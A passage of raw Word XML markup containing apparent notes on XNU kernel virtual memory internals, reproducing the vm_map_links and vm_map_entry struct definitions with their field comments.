        </w:rPr>
        <w:t xml:space="preserve">         nentries</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Number of entries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boolean_t       entries_pageable</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are map entries pageabl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lastRenderedPageBreak/>
        <w:t xml:space="preserve">    vm_map_offset_t     highest_entry_end_addr</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The ending address of the highest allocated vm_entry_t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ifdef</w:t>
      </w:r>
      <w:r w:rsidRPr="007368EC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> VM_MAP_STORE_USE_RB</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rb_head  rb_head_store</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endif</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int</w:t>
      </w:r>
      <w:r w:rsidRPr="007368EC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">         page_shift</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page shift */</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007368EC" w:rsidRDefault="007368EC" w:rsidP="007368EC">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007368EC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>};</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007368EC" w:rsidRPr="007368EC" w:rsidRDefault="007368EC" w:rsidP="007368EC">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007368EC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>vm map links</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Type:       vm_map_entry_t [internal use only]</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Description:</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A single mapping within an address map.</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Implementation:</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Address map entries consist of start and end addresses,</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a VM object (or sub map) and offset into that object,</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and user-exported inheritance and protection information.</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Control information for virtual copy operations is also</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007368EC" w:rsidRPr="007368EC" w:rsidRDefault="007368EC" w:rsidP="007368EC">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007368EC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> *      stored in the address map entry.</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i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> */</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007368EC" w:rsidRPr="007368EC" w:rsidRDefault="007368EC" w:rsidP="007368EC">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pP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b/>
          <w:bCs/>
          <w:color w:val="000080"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>struct</w:t>
      </w:r>
      <w:r w:rsidRPr="007368EC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> vm_map_links </w:t>
      </w:r>
      <w:r w:rsidRPr="007368EC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>{</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sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="007368EC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000080"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>struct</w:t>
      </w:r>
      <w:r w:rsidRPr="007368EC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> vm_map_entry </w:t>
      </w:r>
      <w:r w:rsidRPr="007368EC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r w:rsidRPr="007368EC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>prev</w:t>
      </w:r>
      <w:r w:rsidRPr="007368EC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r w:rsidRPr="007368EC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r w:rsidRPr="007368EC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/* previous entry */</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sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="007368EC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000080"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>struct</w:t>
      </w:r>
      <w:r w:rsidRPr="007368EC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> vm_map_entry </w:t>
      </w:r>
      <w:r w:rsidRPr="007368EC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r w:rsidRPr="007368EC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>next</w:t>
      </w:r>
      <w:r w:rsidRPr="007368EC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r w:rsidRPr="007368EC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r w:rsidRPr="007368EC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/* next entry */</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sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    vm_map_offset_t     start</w:t>
      </w:r>
      <w:r w:rsidRPr="007368EC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r w:rsidRPr="007368EC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r w:rsidRPr="007368EC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/* start address */</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sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    vm_map_offset_t     end</w:t>
      </w:r>
      <w:r w:rsidRPr="007368EC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r w:rsidRPr="007368EC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="007368EC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/* end address */</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007368EC" w:rsidRPr="007368EC" w:rsidRDefault="007368EC" w:rsidP="007368EC">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007368EC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>};</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00026826" w:rsidRDefault="007368EC" w:rsidP="007368EC">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>vm map entry</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007368EC" w:rsidRDefault="007368EC" w:rsidP="007368EC">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007368EC" w:rsidRPr="007368EC" w:rsidRDefault="007368EC" w:rsidP="007368EC">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007368EC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="18"/>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entry </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links links</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links to other entries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vme_prev        links</w:t>
      </w:r>
      <w:r w:rsidRPr="007368EC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="007368EC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>prev</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vme_next        links</w:t>
      </w:r>
      <w:r w:rsidRPr="007368EC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="007368EC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>nex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vme_start       links</w:t>
      </w:r>
      <w:r w:rsidRPr="007368EC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="007368EC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>star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vme_end         links</w:t>
      </w:r>
      <w:r w:rsidRPr="007368EC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="007368EC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>end</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007368EC" w:rsidRPr="007368EC" w:rsidRDefault="007368EC" w:rsidP="007368EC">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pP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store store</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union</w:t>
      </w:r>
      <w:r w:rsidRPr="007368EC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007368EC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>vm_map_object object</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object I point to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vm_object_offset_t  offset</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offset into object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unsigned</w:t>
      </w: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in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is_shared</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region is shared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is_sub_map</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Is "object" a submap?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in_transition</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Entry being changed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needs_wakeup</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Waiters on in_transition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vm_behavior_t */</w:t>
      </w:r>
      <w:r w:rsidRPr="007368EC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> behavior</w:t>
      </w:r>
      <w:r w:rsidRPr="007368EC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="007368EC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="008080"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>2</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user paging behavior hint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ehavior is not defined for submap typ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needs_copy</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object need to be copied?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Only in task maps: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lastRenderedPageBreak/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="007368EC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/* vm_prot_t */</w:t>
      </w:r>
      <w:r w:rsidRPr="007368EC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r w:rsidRPr="005B48FC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>protection</w:t>
      </w:r>
      <w:r w:rsidRPr="007368EC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="007368EC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="008080"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>3</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protection cod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vm_prot_t */</w:t>
      </w:r>
      <w:r w:rsidRPr="007368EC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">     max_protection</w:t>
      </w:r>
      <w:r w:rsidRPr="007368EC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="007368EC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="008080"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="007368EC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="007368EC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/* maximum protection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vm_inherit_t */</w:t>
      </w:r>
      <w:r w:rsidRPr="007368EC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  inheritance</w:t>
      </w:r>
      <w:r w:rsidRPr="007368EC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="007368EC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="008080"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>2</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inheritance */</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use_pmap</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use_pmap is overloaded:</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if "is_sub_map":</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use a nested pmap?</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else (i.e. if objec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use pmap accounting</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for footprin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i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                         */</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IMPORTAN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The "alias" field can be updated while holding the VM map lock</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shared".  It's OK as along as it's the only field that can be</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i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">     * updated without the VM map "exclusive" lock.</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i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserv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unsigned char */</w:t>
      </w:r>
      <w:r w:rsidRPr="007368EC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> alias</w:t>
      </w:r>
      <w:r w:rsidRPr="007368EC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="007368EC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="008080"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>8</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user alias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no_cache</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should new pages be cached?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permanent</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mapping can not be removed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superpage_size</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i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/* use superpages of a certain siz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map_aligned</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align to map's page siz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zero_wired_pages</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zero out the wired pages of this entry it is being deleted without unwiring them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lastRenderedPageBreak/>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used_for_jit</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i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>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from_reserved_zone</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Allocated from</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i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                         * kernel reserved zone  */</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007368EC" w:rsidRPr="007368EC" w:rsidRDefault="007368EC" w:rsidP="007368EC">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pP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iokit accounting: use the virtual size rather than resident siz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boolean_t */</w:t>
      </w:r>
      <w:r w:rsidRPr="007368EC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> iokit_acct</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unsigned</w:t>
      </w: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hort</w:t>
      </w:r>
      <w:r w:rsidRPr="007368EC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">      wired_count</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can be paged if = 0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unsigned</w:t>
      </w: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hort</w:t>
      </w:r>
      <w:r w:rsidRPr="007368EC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">      user_wired_count</w:t>
      </w:r>
      <w:r w:rsidRPr="007368EC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r w:rsidRPr="007368EC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007368EC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/* for vm_wir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if</w:t>
      </w:r>
      <w:r w:rsidRPr="007368EC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> DEBUG</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MAP_ENTRY_CREATION_DEBUG </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define</w:t>
      </w:r>
      <w:r w:rsidRPr="007368EC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> MAP_ENTRY_INSERTION_DEBUG </w:t>
      </w:r>
      <w:r w:rsidRPr="007368EC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="007368EC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="008080"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>1</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endif</w:t>
      </w:r>
      <w:r w:rsidRPr="007368EC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  </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if</w:t>
      </w:r>
      <w:r w:rsidRPr="007368EC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> MAP_ENTRY_CREATION_DEBUG</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w:t>
      </w:r>
      <w:r w:rsidRPr="007368EC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000080"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>struct</w:t>
      </w:r>
      <w:r w:rsidRPr="007368EC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> vm_map_header    </w:t>
      </w:r>
      <w:r w:rsidRPr="007368EC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r w:rsidRPr="007368EC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="20"/>
        </w:rPr>
